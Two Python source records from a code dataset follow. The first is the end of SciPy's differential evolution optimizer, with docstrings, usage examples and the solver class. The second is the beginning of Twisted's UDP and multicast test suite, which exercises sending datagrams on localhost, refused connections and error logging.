basis. The mutation constant for that generation is taken from
``U[min, max)``. Dithering can help speed convergence significantly.
Increasing the mutation constant increases the search radius, but will
slow down convergence.
recombination : float, optional
The recombination constant, should be in the range [0, 1]. In the
literature this is also known as the crossover probability, being
denoted by CR. Increasing this value allows a larger number of mutants
to progress into the next generation, but at the risk of population
stability.
seed : int or `np.random.RandomState`, optional
If `seed` is not specified the `np.RandomState` singleton is used.
If `seed` is an int, a new `np.random.RandomState` instance is used,
seeded with seed.
If `seed` is already a `np.random.RandomState instance`, then that
`np.random.RandomState` instance is used.
Specify `seed` for repeatable minimizations.
disp : bool, optional
Display status messages
callback : callable, `callback(xk, convergence=val)`, optional
A function to follow the progress of the minimization. ``xk`` is
the current value of ``x0``. ``val`` represents the fractional
value of the population convergence. When ``val`` is greater than one
the function halts. If callback returns `True`, then the minimization
is halted (any polishing is still carried out).
polish : bool, optional
If True (default), then `scipy.optimize.minimize` with the `L-BFGS-B`
method is used to polish the best population member at the end, which
can improve the minimization slightly.
init : string, optional
Specify how the population initialization is performed. Should be
one of:
- 'latinhypercube'
- 'random'
The default is 'latinhypercube'. Latin Hypercube sampling tries to
maximize coverage of the available parameter space. 'random' initializes
the population randomly - this has the drawback that clustering can
occur, preventing the whole of parameter space being covered.
Returns
-------
res : OptimizeResult
The optimization result represented as a `OptimizeResult` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes. If `polish`
was employed, and a lower minimum was obtained by the polishing, then
OptimizeResult also contains the ``jac`` attribute.
Notes
-----
Differential evolution is a stochastic population based method that is
useful for global optimization problems. At each pass through the population
the algorithm mutates each candidate solution by mixing with other candidate
solutions to create a trial candidate. There are several strategies [2]_ for
creating trial candidates, which suit some problems more than others. The
'best1bin' strategy is a good starting point for many systems. In this
strategy two members of the population are randomly chosen. Their difference
is used to mutate the best member (the `best` in `best1bin`), :math:`b_0`,
so far:
.. math::
b' = b_0 + mutation * (population[rand0] - population[rand1])
A trial vector is then constructed. Starting with a randomly chosen 'i'th
parameter the trial is sequentially filled (in modulo) with parameters from
`b'` or the original candidate. The choice of whether to use `b'` or the
original candidate is made with a binomial distribution (the 'bin' in
'best1bin') - a random number in [0, 1) is generated. If this number is
less than the `recombination` constant then the parameter is loaded from
`b'`, otherwise it is loaded from the original candidate. The final
parameter is always loaded from `b'`. Once the trial candidate is built
its fitness is assessed. If the trial is better than the original candidate
then it takes its place. If it is also better than the best overall
candidate it also replaces that.
To improve your chances of finding a global minimum use higher `popsize`
values, with higher `mutation` and (dithering), but lower `recombination`
values. This has the effect of widening the search radius, but slowing
convergence.
.. versionadded:: 0.15.0
Examples
--------
Let us consider the problem of minimizing the Rosenbrock function. This
function is implemented in `rosen` in `scipy.optimize`.
>>> from scipy.optimize import rosen, differential_evolution
>>> bounds = [(0,2), (0, 2), (0, 2), (0, 2), (0, 2)]
>>> result = differential_evolution(rosen, bounds)
>>> result.x, result.fun
(array([1., 1., 1., 1., 1.]), 1.9216496320061384e-19)
Next find the minimum of the Ackley function
(http://en.wikipedia.org/wiki/Test_functions_for_optimization).
>>> from scipy.optimize import differential_evolution
>>> import numpy as np
>>> def ackley(x):
... arg1 = -0.2 * np.sqrt(0.5 * (x[0] ** 2 + x[1] ** 2))
... arg2 = 0.5 * (np.cos(2. * np.pi * x[0]) + np.cos(2. * np.pi * x[1]))
... return -20. * np.exp(arg1) - np.exp(arg2) + 20. + np.e
>>> bounds = [(-5, 5), (-5, 5)]
>>> result = differential_evolution(ackley, bounds)
>>> result.x, result.fun
(array([ 0., 0.]), 4.4408920985006262e-16)
References
----------
.. [1] Storn, R and Price, K, Differential Evolution - a Simple and
Efficient Heuristic for Global Optimization over Continuous Spaces,
Journal of Global Optimization, 1997, 11, 341 - 359.
.. [2] http://www1.icsi.berkeley.edu/~storn/code.html
.. [3] http://en.wikipedia.org/wiki/Differential_evolution
"""
solver = DifferentialEvolutionSolver(func, bounds, args=args,
strategy=strategy, maxiter=maxiter,
popsize=popsize, tol=tol,
mutation=mutation,
recombination=recombination,
seed=seed, polish=polish,
callback=callback,
disp=disp,
init=init)
return solver.solve()
class DifferentialEvolutionSolver(object):
"""This class implements the differential evolution solver
Parameters
----------
func : callable
The objective function to be minimized. Must be in the form
``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
and ``args`` is a tuple of any additional fixed parameters needed to
completely specify the function.
bounds : sequence
Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
defining the lower and upper bounds for the optimizing argument of
`func`. It is required to have ``len(bounds) == len(x)``.
``len(bounds)`` is used to determine the number of parameters in ``x``.
args : tuple, optional
Any additional fixed parameters needed to
completely specify the objective function.
strategy : str, optional
The differential evolution strategy to use. Should be one of:
- 'best1bin'
- 'best1exp'
- 'rand1exp'
- 'randtobest1exp'
- 'best2exp'
- 'rand2exp'
- 'randtobest1bin'
- 'best2bin'
- 'rand2bin'
- 'rand1bin'
The default is 'best1bin'
maxiter : int, optional
The maximum number of generations over which the entire population is
evolved. The maximum number of function evaluations (with no polishing)
is: ``(maxiter + 1) * popsize * len(x)``
popsize : int, optional
A multiplier for setting the total population size. The population has
``popsize * len(x)`` individuals.
tol : float, optional
When the mean of the population energies, multiplied by tol,
divided by the standard deviation of the population energies
is greater than 1 the solving process terminates:
``convergence = mean(pop) * tol / stdev(pop) > 1``
mutation : float or tuple(float, float), optional
The mutation constant. In the literature this is also known as
differential weight, being denoted by F.
If specified as a float it should be in the range [0, 2].
If specified as a tuple ``(min, max)`` dithering is employed. Dithering
randomly changes the mutation constant on a generation by generation
basis. The mutation constant for that generation is taken from
U[min, max). Dithering can help speed convergence significantly.
Increasing the mutation constant increases the search radius, but will
slow down convergence.
recombination : float, optional
The recombination constant, should be in the range [0, 1]. In the
literature this is also known as the crossover probability, being
denoted by CR. Increasing this value allows a larger number of mutants
to progress into the next generation, but at the risk of population
stability.
seed : int or `np.random.RandomState`, optional
If `seed` is not specified the `np.random.RandomState` singleton is
used.
If `seed` is an int, a new `np.random.RandomState` instance is used,
seeded with `seed`.
If `seed` is already a `np.random.RandomState` instance, then that
`np.random.RandomState` instance is used.
Specify `seed` for repeatable minimizations.
disp : bool, optional
Display status messages
callback : callable, `callback(xk, convergence=val)`, optional
A function to follow the progress of the minimization. ``xk`` is
the current value of ``x0``. ``val`` represents the fractional
value of the population convergence. When ``val`` is greater than one
the function halts. If callback returns `True`, then the minimization
is halted (any polishing is still carried out).
polish : bool, optional
If True, then `scipy.optimize.minimize` with the `L-BFGS-B` method
is used to polish the best population member at the end. This requires
a few more function evaluations.
maxfun : int, optional
Set the maximum number of function evaluations. However, it probably
makes more sense to set `maxiter` instead.
init : string, optional
Specify which type of population initialization is performed. Should be
one of:
- 'latinhypercube'
- 'random'
"""
# Dispatch of mutation strategy method (binomial or exponential).
_binomial = {'best1bin': '_best1',
'randtobest1bin': '_randtobest1',
'best2bin': '_best2',
'rand2bin': '_rand2',
'rand1bin': '_rand1'}
_exponential = {'best1exp': '_best1',
'rand1exp': '_rand1',
'randtobest1exp': '_randtobest1',
'best2exp': '_best2',
'rand2exp': '_rand2'}
def __init__(self, func, bounds, args=(),
strategy='best1bin', maxiter=1000, popsize=15,
tol=0.01, mutation=(0.5, 1), recombination=0.7, seed=None,
maxfun=np.inf, callback=None, disp=False, polish=True,
init='latinhypercube'):
if strategy in self._binomial:
self.mutation_func = getattr(self, self._binomial[strategy])
elif strategy in self._exponential:
self.mutation_func = getattr(self, self._exponential[strategy])
else:
raise ValueError("Please select a valid mutation strategy")
self.strategy = strategy
self.callback = callback
self.polish = polish
self.tol = tol
# Mutation constant should be in [0, 2). If specified as a sequence
# then dithering is performed.
self.scale = mutation
if (not np.all(np.isfinite(mutation)) or
np.any(np.array(mutation) >= 2) or
np.any(np.array(mutation) < 0)):
raise ValueError('The mutation constant must be a float in '
'U[0, 2), or specified as a tuple(min, max)'
' where min < max and min, max are in U[0, 2).')
self.dither = None
if hasattr(mutation, '__iter__') and len(mutation) > 1:
self.dither = [mutation[0], mutation[1]]
self.dither.sort()
self.cross_over_probability = recombination
self.func = func
self.args = args
# convert tuple of lower and upper bounds to limits
# [(low_0, high_0), ..., (low_n, high_n]
# -> [[low_0, ..., low_n], [high_0, ..., high_n]]
self.limits = np.array(bounds, dtype='float').T
if (np.size(self.limits, 0) != 2 or not
np.all(np.isfinite(self.limits))):
raise ValueError('bounds should be a sequence containing '
'real valued (min, max) pairs for each value'
' in x')
if maxiter is None: # the default used to be None
maxiter = 1000
self.maxiter = maxiter
if maxfun is None: # the default used to be None
maxfun = np.inf
self.maxfun = maxfun
# population is scaled to between [0, 1].
# We have to scale between parameter <-> population
# save these arguments for _scale_parameter and
# _unscale_parameter. This is an optimization
self.__scale_arg1 = 0.5 * (self.limits[0] + self.limits[1])
self.__scale_arg2 = np.fabs(self.limits[0] - self.limits[1])
self.parameter_count = np.size(self.limits, 1)
self.random_number_generator = _make_random_gen(seed)
# default population initialization is a latin hypercube design, but
# there are other population initializations possible.
self.num_population_members = popsize * self.parameter_count
self.population_shape = (self.num_population_members,
self.parameter_count)
self._nfev = 0
if init == 'latinhypercube':
self.init_population_lhs()
elif init == 'random':
self.init_population_random()
else:
raise ValueError("The population initialization method must be one"
"of 'latinhypercube' or 'random'")
self.disp = disp
def init_population_lhs(self):
"""
Initializes the population with Latin Hypercube Sampling.
Latin Hypercube Sampling ensures that each parameter is uniformly
sampled over its range.
"""
rng = self.random_number_generator
# Each parameter range needs to be sampled uniformly. The scaled
# parameter range ([0, 1)) needs to be split into
# `self.num_population_members` segments, each of which has the following
# size:
segsize = 1.0 / self.num_population_members
# Within each segment we sample from a uniform random distribution.
# We need to do this sampling for each parameter.
samples = (segsize * rng.random_sample(self.population_shape)
# Offset each segment to cover the entire parameter range [0, 1)
+ np.linspace(0., 1., self.num_population_members,
endpoint=False)[:, np.newaxis])
# Create an array for population of candidate solutions.
self.population = np.zeros_like(samples)
# Initialize population of candidate solutions by permutation of the
# random samples.
for j in range(self.parameter_count):
order = rng.permutation(range(self.num_population_members))
self.population[:, j] = samples[order, j]
# reset population energies
self.population_energies = (np.ones(self.num_population_members) *
np.inf)
# reset number of function evaluations counter
self._nfev = 0
def init_population_random(self):
"""
Initialises the population at random. This type of initialization
can possess clustering, Latin Hypercube sampling is generally better.
"""
rng = self.random_number_generator
self.population = rng.random_sample(self.population_shape)
# reset population energies
self.population_energies = (np.ones(self.num_population_members) *
np.inf)
# reset number of function evaluations counter
self._nfev = 0
@property
def x(self):
"""
The best solution from the solver
Returns
-------
x : ndarray
The best solution from the solver.
"""
return self._scale_parameters(self.population[0])
@property
def convergence(self):
"""
The standard deviation of the population energies divided by their
mean.
"""
return (np.std(self.population_energies) /
np.abs(np.mean(self.population_energies) + _MACHEPS))
def solve(self):
"""
Runs the DifferentialEvolutionSolver.
Returns
-------
res : OptimizeResult
The optimization result represented as a ``OptimizeResult`` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes. If `polish`
was employed, and a lower minimum was obtained by the polishing,
then OptimizeResult also contains the ``jac`` attribute.
"""
nit, warning_flag = 0, False
status_message = _status_message['success']
# The population may have just been initialized (all entries are
# np.inf). If it has you have to calculate the initial energies.
# Although this is also done in the evolve generator it's possible
# that someone can set maxiter=0, at which point we still want the
# initial energies to be calculated (the following loop isn't run).
if np.all(np.isinf(self.population_energies)):
self._calculate_population_energies()
# do the optimisation.
for nit in range(1, self.maxiter + 1):
# evolve the population by a generation
try:
next(self)
except StopIteration:
warning_flag = True
status_message = _status_message['maxfev']
break
if self.disp:
print("differential_evolution step %d: f(x)= %g"
% (nit,
self.population_energies[0]))
# stop when the fractional s.d. of the population is less than tol
# of the mean energy
convergence = self.convergence
if (self.callback and
self.callback(self._scale_parameters(self.population[0]),
convergence=self.tol / convergence) is True):
warning_flag = True
status_message = ('callback function requested stop early '
'by returning True')
break
if convergence < self.tol or warning_flag:
break
else:
status_message = _status_message['maxiter']
warning_flag = True
DE_result = OptimizeResult(
x=self.x,
fun=self.population_energies[0],
nfev=self._nfev,
nit=nit,
message=status_message,
success=(warning_flag is not True))
if self.polish:
result = minimize(self.func,
np.copy(DE_result.x),
method='L-BFGS-B',
bounds=self.limits.T,
args=self.args)
self._nfev += result.nfev
DE_result.nfev = self._nfev
if result.fun < DE_result.fun:
DE_result.fun = result.fun
DE_result.x = result.x
DE_result.jac = result.jac
# to keep internal state consistent
self.population_energies[0] = result.fun
self.population[0] = self._unscale_parameters(result.x)
return DE_result
def _calculate_population_energies(self):
"""
Calculate the energies of all the population members at the same time.
Puts the best member in first place. Useful if the population has just
been initialised.
"""
for index, candidate in enumerate(self.population):
if self._nfev > self.maxfun:
break
parameters = self._scale_parameters(candidate)
self.population_energies[index] = self.func(parameters,
*self.args)
self._nfev += 1
minval = np.argmin(self.population_energies)
# put the lowest energy into the best solution position.
lowest_energy = self.population_energies[minval]
self.population_energies[minval] = self.population_energies[0]
self.population_energies[0] = lowest_energy
self.population[[0, minval], :] = self.population[[minval, 0], :]
def __iter__(self):
return self
def __next__(self):
"""
Evolve the population by a single generation
Returns
-------
x : ndarray
The best solution from the solver.
fun : float
Value of objective function obtained from the best solution.
"""
# the population may have just been initialized (all entries are
# np.inf). If it has you have to calculate the initial energies
if np.all(np.isinf(self.population_energies)):
self._calculate_population_energies()
if self.dither is not None:
self.scale = (self.random_number_generator.rand()
* (self.dither[1] - self.dither[0]) + self.dither[0])
for candidate in range(self.num_population_members):
if self._nfev > self.maxfun:
raise StopIteration
# create a trial solution
trial = self._mutate(candidate)
# ensuring that it's in the range [0, 1)
self._ensure_constraint(trial)
# scale from [0, 1) to the actual parameter value
parameters = self._scale_parameters(trial)
# determine the energy of the objective function
energy = self.func(parameters, *self.args)
self._nfev += 1
# if the energy of the trial candidate is lower than the
# original population member then replace it
if energy < self.population_energies[candidate]:
self.population[candidate] = trial
self.population_energies[candidate] = energy
# if the trial candidate also has a lower energy than the
# best solution then replace that as well
if energy < self.population_energies[0]:
self.population_energies[0] = energy
self.population[0] = trial
return self.x, self.population_energies[0]
def next(self):
"""
Evolve the population by a single generation
Returns
-------
x : ndarray
The best solution from the solver.
fun : float
Value of objective function obtained from the best solution.
"""
# next() is required for compatibility with Python2.7.
return self.__next__()
def _scale_parameters(self, trial):
"""
scale from a number between 0 and 1 to parameters.
"""
return self.__scale_arg1 + (trial - 0.5) * self.__scale_arg2
def _unscale_parameters(self, parameters):
"""
scale from parameters to a number between 0 and 1.
"""
return (parameters - self.__scale_arg1) / self.__scale_arg2 + 0.5
def _ensure_constraint(self, trial):
"""
make sure the parameters lie between the limits
"""
for index, param in enumerate(trial):
if param > 1 or param < 0:
trial[index] = self.random_number_generator.rand()
def _mutate(self, candidate):
"""
create a trial vector based on a mutation strategy
"""
trial = np.copy(self.population[candidate])
rng = self.random_number_generator
fill_point = rng.randint(0, self.parameter_count)
if (self.strategy == 'randtobest1exp' or
self.strategy == 'randtobest1bin'):
bprime = self.mutation_func(candidate,
self._select_samples(candidate, 5))
else:
bprime = self.mutation_func(self._select_samples(candidate, 5))
if self.strategy in self._binomial:
crossovers = rng.rand(self.parameter_count)
crossovers = crossovers < self.cross_over_probability
# the last one is always from the bprime vector for binomial
# If you fill in modulo with a loop you have to set the last one to
# true. If you don't use a loop then you can have any random entry
# be True.
crossovers[fill_point] = True
trial = np.where(crossovers, bprime, trial)
return trial
elif self.strategy in self._exponential:
i = 0
while (i < self.parameter_count and
rng.rand() < self.cross_over_probability):
trial[fill_point] = bprime[fill_point]
fill_point = (fill_point + 1) % self.parameter_count
i += 1
return trial
def _best1(self, samples):
"""
best1bin, best1exp
"""
r0, r1 = samples[:2]
return (self.population[0] + self.scale *
(self.population[r0] - self.population[r1]))
def _rand1(self, samples):
"""
rand1bin, rand1exp
"""
r0, r1, r2 = samples[:3]
return (self.population[r0] + self.scale *
(self.population[r1] - self.population[r2]))
def _randtobest1(self, candidate, samples):
"""
randtobest1bin, randtobest1exp
"""
r0, r1 = samples[:2]
bprime = np.copy(self.population[candidate])
bprime += self.scale * (self.population[0] - bprime)
bprime += self.scale * (self.population[r0] -
self.population[r1])
return bprime
def _best2(self, samples):
"""
best2bin, best2exp
"""
r0, r1, r2, r3 = samples[:4]
bprime = (self.population[0] + self.scale *
(self.population[r0] + self.population[r1] -
self.population[r2] - self.population[r3]))
return bprime
def _rand2(self, samples):
"""
rand2bin, rand2exp
"""
r0, r1, r2, r3, r4 = samples
bprime = (self.population[r0] + self.scale *
(self.population[r1] + self.population[r2] -
self.population[r3] - self.population[r4]))
return bprime
def _select_samples(self, candidate, number_samples):
"""
obtain random integers from range(self.num_population_members),
without replacement. You can't have the original candidate either.
"""
idxs = list(range(self.num_population_members))
idxs.remove(candidate)
self.random_number_generator.shuffle(idxs)
idxs = idxs[:number_samples]
return idxs
def _make_random_gen(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed) | unknown | codeparrot/codeparrot-clean | ||
# -*- test-case-name: twisted.test.test_udp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for implementations of L{IReactorUDP} and L{IReactorMulticast}.
"""
from twisted.trial import unittest
from twisted.internet.defer import Deferred, gatherResults, maybeDeferred
from twisted.internet import protocol, reactor, error, defer, interfaces, udp
from twisted.python import runtime
class Mixin:
started = 0
stopped = 0
startedDeferred = None
def __init__(self):
self.packets = []
def startProtocol(self):
self.started = 1
if self.startedDeferred is not None:
d, self.startedDeferred = self.startedDeferred, None
d.callback(None)
def stopProtocol(self):
self.stopped = 1
class Server(Mixin, protocol.DatagramProtocol):
packetReceived = None
refused = 0
def datagramReceived(self, data, addr):
self.packets.append((data, addr))
if self.packetReceived is not None:
d, self.packetReceived = self.packetReceived, None
d.callback(None)
class Client(Mixin, protocol.ConnectedDatagramProtocol):
packetReceived = None
refused = 0
def datagramReceived(self, data):
self.packets.append(data)
if self.packetReceived is not None:
d, self.packetReceived = self.packetReceived, None
d.callback(None)
def connectionFailed(self, failure):
if self.startedDeferred is not None:
d, self.startedDeferred = self.startedDeferred, None
d.errback(failure)
self.failure = failure
def connectionRefused(self):
if self.startedDeferred is not None:
d, self.startedDeferred = self.startedDeferred, None
d.errback(error.ConnectionRefusedError("yup"))
self.refused = 1
class GoodClient(Server):
def connectionRefused(self):
if self.startedDeferred is not None:
d, self.startedDeferred = self.startedDeferred, None
d.errback(error.ConnectionRefusedError("yup"))
self.refused = 1
class BadClientError(Exception):
"""
Raised by BadClient at the end of every datagramReceived call to try and
screw stuff up.
"""
class BadClient(protocol.DatagramProtocol):
"""
A DatagramProtocol which always raises an exception from datagramReceived.
Used to test error handling behavior in the reactor for that method.
"""
d = None
def setDeferred(self, d):
"""
Set the Deferred which will be called back when datagramReceived is
called.
"""
self.d = d
def datagramReceived(self, bytes, addr):
if self.d is not None:
d, self.d = self.d, None
d.callback(bytes)
raise BadClientError("Application code is very buggy!")
class UDPTestCase(unittest.TestCase):
def test_oldAddress(self):
"""
The C{type} of the host address of a listening L{DatagramProtocol}'s
transport is C{"UDP"}.
"""
server = Server()
d = server.startedDeferred = defer.Deferred()
p = reactor.listenUDP(0, server, interface="127.0.0.1")
def cbStarted(ignored):
addr = p.getHost()
self.assertEqual(addr.type, 'UDP')
return p.stopListening()
return d.addCallback(cbStarted)
def test_startStop(self):
"""
The L{DatagramProtocol}'s C{startProtocol} and C{stopProtocol}
methods are called when its transports starts and stops listening,
respectively.
"""
server = Server()
d = server.startedDeferred = defer.Deferred()
port1 = reactor.listenUDP(0, server, interface="127.0.0.1")
def cbStarted(ignored):
self.assertEqual(server.started, 1)
self.assertEqual(server.stopped, 0)
return port1.stopListening()
def cbStopped(ignored):
self.assertEqual(server.stopped, 1)
return d.addCallback(cbStarted).addCallback(cbStopped)
def test_rebind(self):
"""
Re-listening with the same L{DatagramProtocol} re-invokes the
C{startProtocol} callback.
"""
server = Server()
d = server.startedDeferred = defer.Deferred()
p = reactor.listenUDP(0, server, interface="127.0.0.1")
def cbStarted(ignored, port):
return port.stopListening()
def cbStopped(ignored):
d = server.startedDeferred = defer.Deferred()
p = reactor.listenUDP(0, server, interface="127.0.0.1")
return d.addCallback(cbStarted, p)
return d.addCallback(cbStarted, p)
def test_bindError(self):
"""
A L{CannotListenError} exception is raised when attempting to bind a
second protocol instance to an already bound port
"""
server = Server()
d = server.startedDeferred = defer.Deferred()
port = reactor.listenUDP(0, server, interface='127.0.0.1')
def cbStarted(ignored):
self.assertEqual(port.getHost(), server.transport.getHost())
server2 = Server()
self.assertRaises(
error.CannotListenError,
reactor.listenUDP, port.getHost().port, server2,
interface='127.0.0.1')
d.addCallback(cbStarted)
def cbFinished(ignored):
return port.stopListening()
d.addCallback(cbFinished)
return d
def test_sendPackets(self):
"""
Datagrams can be sent with the transport's C{write} method and
received via the C{datagramReceived} callback method.
"""
server = Server()
serverStarted = server.startedDeferred = defer.Deferred()
port1 = reactor.listenUDP(0, server, interface="127.0.0.1")
client = GoodClient()
clientStarted = client.startedDeferred = defer.Deferred()
def cbServerStarted(ignored):
self.port2 = reactor.listenUDP(0, client, interface="127.0.0.1")
return clientStarted
d = serverStarted.addCallback(cbServerStarted)
def cbClientStarted(ignored):
client.transport.connect("127.0.0.1",
server.transport.getHost().port)
cAddr = client.transport.getHost()
sAddr = server.transport.getHost()
serverSend = client.packetReceived = defer.Deferred()
server.transport.write("hello", (cAddr.host, cAddr.port))
clientWrites = [
("a",),
("b", None),
("c", (sAddr.host, sAddr.port))]
def cbClientSend(ignored):
if clientWrites:
nextClientWrite = server.packetReceived = defer.Deferred()
nextClientWrite.addCallback(cbClientSend)
client.transport.write(*clientWrites.pop(0))
return nextClientWrite
# No one will ever call .errback on either of these Deferreds,
# but there is a non-trivial amount of test code which might
# cause them to fail somehow. So fireOnOneErrback=True.
return defer.DeferredList([
cbClientSend(None),
serverSend],
fireOnOneErrback=True)
d.addCallback(cbClientStarted)
def cbSendsFinished(ignored):
cAddr = client.transport.getHost()
sAddr = server.transport.getHost()
self.assertEqual(
client.packets,
[("hello", (sAddr.host, sAddr.port))])
clientAddr = (cAddr.host, cAddr.port)
self.assertEqual(
server.packets,
[("a", clientAddr),
("b", clientAddr),
("c", clientAddr)])
d.addCallback(cbSendsFinished)
def cbFinished(ignored):
return defer.DeferredList([
defer.maybeDeferred(port1.stopListening),
defer.maybeDeferred(self.port2.stopListening)],
fireOnOneErrback=True)
d.addCallback(cbFinished)
return d
def test_connectionRefused(self):
"""
A L{ConnectionRefusedError} exception is raised when a connection
attempt is actively refused by the other end.
Note: This test assumes no one is listening on port 80 UDP.
"""
client = GoodClient()
clientStarted = client.startedDeferred = defer.Deferred()
port = reactor.listenUDP(0, client, interface="127.0.0.1")
server = Server()
serverStarted = server.startedDeferred = defer.Deferred()
port2 = reactor.listenUDP(0, server, interface="127.0.0.1")
d = defer.DeferredList(
[clientStarted, serverStarted],
fireOnOneErrback=True)
def cbStarted(ignored):
connectionRefused = client.startedDeferred = defer.Deferred()
client.transport.connect("127.0.0.1", 80)
for i in range(10):
client.transport.write(str(i))
server.transport.write(str(i), ("127.0.0.1", 80))
return self.assertFailure(
connectionRefused,
error.ConnectionRefusedError)
d.addCallback(cbStarted)
def cbFinished(ignored):
return defer.DeferredList([
defer.maybeDeferred(port.stopListening),
defer.maybeDeferred(port2.stopListening)],
fireOnOneErrback=True)
d.addCallback(cbFinished)
return d
def test_badConnect(self):
"""
A call to the transport's connect method fails with a L{ValueError}
when a non-IP address is passed as the host value.
A call to a transport's connect method fails with a L{RuntimeError}
when the transport is already connected.
"""
client = GoodClient()
port = reactor.listenUDP(0, client, interface="127.0.0.1")
self.assertRaises(ValueError, client.transport.connect,
"localhost", 80)
client.transport.connect("127.0.0.1", 80)
self.assertRaises(RuntimeError, client.transport.connect,
"127.0.0.1", 80)
return port.stopListening()
def test_datagramReceivedError(self):
"""
When datagramReceived raises an exception it is logged but the port
is not disconnected.
"""
finalDeferred = defer.Deferred()
def cbCompleted(ign):
"""
Flush the exceptions which the reactor should have logged and make
sure they're actually there.
"""
errs = self.flushLoggedErrors(BadClientError)
self.assertEqual(len(errs), 2, "Incorrectly found %d errors, expected 2" % (len(errs),))
finalDeferred.addCallback(cbCompleted)
client = BadClient()
port = reactor.listenUDP(0, client, interface='127.0.0.1')
def cbCleanup(result):
"""
Disconnect the port we started and pass on whatever was given to us
in case it was a Failure.
"""
return defer.maybeDeferred(port.stopListening).addBoth(lambda ign: result)
finalDeferred.addBoth(cbCleanup)
addr = port.getHost()
# UDP is not reliable. Try to send as many as 60 packets before giving
# up. Conceivably, all sixty could be lost, but they probably won't be
# unless all UDP traffic is being dropped, and then the rest of these
# UDP tests will likely fail as well. Ideally, this test (and probably
# others) wouldn't even use actual UDP traffic: instead, they would
# stub out the socket with a fake one which could be made to behave in
# whatever way the test desires. Unfortunately, this is hard because
# of differences in various reactor implementations.
attempts = range(60)
succeededAttempts = []
def makeAttempt():
"""
Send one packet to the listening BadClient. Set up a 0.1 second
timeout to do re-transmits in case the packet is dropped. When two
packets have been received by the BadClient, stop sending and let
the finalDeferred's callbacks do some assertions.
"""
if not attempts:
try:
self.fail("Not enough packets received")
except:
finalDeferred.errback()
self.failIfIdentical(client.transport, None, "UDP Protocol lost its transport")
packet = str(attempts.pop(0))
packetDeferred = defer.Deferred()
client.setDeferred(packetDeferred)
client.transport.write(packet, (addr.host, addr.port))
def cbPacketReceived(packet):
"""
A packet arrived. Cancel the timeout for it, record it, and
maybe finish the test.
"""
timeoutCall.cancel()
succeededAttempts.append(packet)
if len(succeededAttempts) == 2:
# The second error has not yet been logged, since the
# exception which causes it hasn't even been raised yet.
# Give the datagramReceived call a chance to finish, then
# let the test finish asserting things.
reactor.callLater(0, finalDeferred.callback, None)
else:
makeAttempt()
def ebPacketTimeout(err):
"""
The packet wasn't received quickly enough. Try sending another
one. It doesn't matter if the packet for which this was the
timeout eventually arrives: makeAttempt throws away the
Deferred on which this function is the errback, so when
datagramReceived callbacks, so it won't be on this Deferred, so
it won't raise an AlreadyCalledError.
"""
makeAttempt()
packetDeferred.addCallbacks(cbPacketReceived, ebPacketTimeout)
packetDeferred.addErrback(finalDeferred.errback)
timeoutCall = reactor.callLater(
0.1, packetDeferred.errback,
error.TimeoutError(
"Timed out in testDatagramReceivedError"))
makeAttempt()
return finalDeferred
def test_portRepr(self):
"""
The port number being listened on can be found in the string
returned from calling repr() on L{twisted.internet.udp.Port}.
"""
client = GoodClient()
p = reactor.listenUDP(0, client)
portNo = str(p.getHost().port)
self.failIf(repr(p).find(portNo) == -1)
def stoppedListening(ign):
self.failIf(repr(p).find(portNo) != -1)
d = defer.maybeDeferred(p.stopListening)
d.addCallback(stoppedListening)
return d
def test_NoWarningOnBroadcast(self):
"""
C{'<broadcast>'} is an alternative way to say C{'255.255.255.255'}
({socket.gethostbyname("<broadcast>")} returns C{'255.255.255.255'}),
so because it becomes a valid IP address, no deprecation warning about
passing hostnames to L{twisted.internet.udp.Port.write} needs to be
emitted by C{write()} in this case.
"""
class fakeSocket:
def sendto(self, foo, bar):
pass
p = udp.Port(0, Server())
p.socket = fakeSocket()
p.write("test", ("<broadcast>", 1234))
warnings = self.flushWarnings([self.test_NoWarningOnBroadcast])
self.assertEqual(len(warnings), 0)
class ReactorShutdownInteraction(unittest.TestCase):
"""Test reactor shutdown interaction"""
def setUp(self):
"""Start a UDP port"""
self.server = Server()
self.port = reactor.listenUDP(0, self.server, interface='127.0.0.1')
def tearDown(self):
"""Stop the UDP port"""
return self.port.stopListening()
def testShutdownFromDatagramReceived(self):
"""Test reactor shutdown while in a recvfrom() loop"""
# udp.Port's doRead calls recvfrom() in a loop, as an optimization.
# It is important this loop terminate under various conditions.
# Previously, if datagramReceived synchronously invoked
# reactor.stop(), under certain reactors, the Port's socket would
# synchronously disappear, causing an AttributeError inside that
# loop. This was mishandled, causing the loop to spin forever.
# This test is primarily to ensure that the loop never spins
# forever.
finished = defer.Deferred()
pr = self.server.packetReceived = defer.Deferred()
def pktRece(ignored):
# Simulate reactor.stop() behavior :(
self.server.transport.connectionLost()
# Then delay this Deferred chain until the protocol has been
# disconnected, as the reactor should do in an error condition
# such as we are inducing. This is very much a whitebox test.
reactor.callLater(0, finished.callback, None)
pr.addCallback(pktRece)
def flushErrors(ignored):
# We are breaking abstraction and calling private APIs, any
# number of horrible errors might occur. As long as the reactor
# doesn't hang, this test is satisfied. (There may be room for
# another, stricter test.)
self.flushLoggedErrors()
finished.addCallback(flushErrors)
self.server.transport.write('\0' * 64, ('127.0.0.1',
self.server.transport.getHost().port))
return finished
class MulticastTestCase(unittest.TestCase):
def setUp(self):
self.server = Server()
self.client = Client()
# multicast won't work if we listen over loopback, apparently
self.port1 = reactor.listenMulticast(0, self.server)
self.port2 = reactor.listenMulticast(0, self.client)
self.client.transport.connect(
"127.0.0.1", self.server.transport.getHost().port)
def tearDown(self):
return gatherResults([
maybeDeferred(self.port1.stopListening),
maybeDeferred(self.port2.stopListening)])
def testTTL(self):
for o in self.client, self.server:
self.assertEqual(o.transport.getTTL(), 1)
o.transport.setTTL(2)
self.assertEqual(o.transport.getTTL(), 2)
